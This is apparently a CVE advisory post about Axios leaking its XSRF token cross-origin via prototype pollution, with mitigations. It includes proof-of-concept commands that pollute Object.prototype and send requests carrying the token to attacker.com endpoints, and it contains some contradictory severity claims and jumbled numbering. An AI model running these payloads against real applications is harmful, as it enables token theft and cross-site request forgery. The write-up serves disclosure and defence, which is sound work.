Axios, XSRF Token Cross-Origin Leakage via Prototype Pollution, CVE-TBD (Medium)

By /

Listen to this Post

How the CVE Works (20 lines):

  1. Axios uses `withXSRFToken` config to control XSRF token sending.
  2. Expected boolean values: `true` (always send), `false` (never send), `undefined` (same-origin only).

3. Vulnerable code in `lib/helpers/resolveConfig.js:59` uses truthy/falsy coercion.

  1. Condition: if (withXSRFToken || (withXSRFToken !== false && isURLSameOrigin(...))).
  2. Any truthy non‑boolean value (e.g., 1, "false", {}, []) makes the first clause true.

6. This short‑circuits the `isURLSameOrigin()` check.

7. Attacker performs prototype pollution: `Object.prototype.withXSRFToken = 1`.

  1. All Axios requests inherit polluted property during config merge.
  2. Browser reads XSRF cookie (e.g., XSRF-TOKEN) and sends it as header.

10. Header name is `X-XSRF-TOKEN` by default.

  1. Token is now attached to every request, including cross‑origin ones.
  2. Attacker hosts `https://attacker.com/collect` and lures victim.
  3. Victim’s browser makes Axios request to attacker’s server.

    14. Request includes X-XSRF-TOKEN: secret‑csrf‑token.

  4. Attacker logs the token, enabling CSRF against the original app.
  5. No user input needed; pollution from any vulnerable dependency triggers it.
  6. Affects all Axios versions since `withXSRFToken` was introduced.
  7. Works only in browsers where `hasStandardBrowserEnv` is true.
  8. Even a developer miswriting `withXSRFToken: “false”` (string) causes the bug.
  9. Fix requires strict boolean comparison instead of truthy coercion.

    DailyCVE Form:

    Platform: Axios library
    Version: All versions
    Vulnerability: XSRF token leakage
    Severity: Medium
    date: 2026-04-15

    Prediction: 2026-04-30

    Analytics under What Undercode Say:

    Check if prototype pollution affects Axios (Node.js with jsdom)
npm install axios jsdom
node -e "const jsdom = require('jsdom'); const { JSDOM } = jsdom; const dom = new JSDOM('', { url: 'https://victim.com' }); global.document = dom.window.document; global.navigator = dom.window.navigator; Object.prototype.withXSRFToken = 1; const axios = require('axios'); axios.get('https://attacker.com/collect').catch(e=>console.log(e.message));"

    // Browser console PoC
Object.prototype.withXSRFToken = 1;
document.cookie = "XSRF-TOKEN=secret123";
axios.get('https://attacker.com/steal').then(r=>console.log('Token leaked')).catch(e=>console.log(e));

    Exploit:

    Attacker injects `Object.prototype.withXSRFToken = 1` via vulnerable dependency (e.g., JSON parse, merge util). Victim navigates to page that makes any Axios request. All requests, even cross‑origin, include the XSRF token in `X-XSRF-TOKEN` header. Attacker hosts endpoint that logs received headers, obtaining the token.

    Protection from this CVE

– Upgrade to patched Axios version (once available).
– Freeze Object.prototype: Object.freeze(Object.prototype).
– Use `Object.create(null)` for config objects.
– Validate `withXSRFToken` with strict `=== true` or === false.
– Avoid prototype‑polluting patterns (e.g., merge, `clone` with unsafe keys).

Impact:

  • Leakage of anti‑CSRF token to any attacker‑controlled origin.
  • Enables CSRF attacks (e.g., state‑changing actions) on the victim application.
  • Affects every Axios request in the application after a single pollution.
  • No session hijacking alone; requires secondary request forgery.
  • Medium severity due to required user interaction and limited confidentiality loss.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top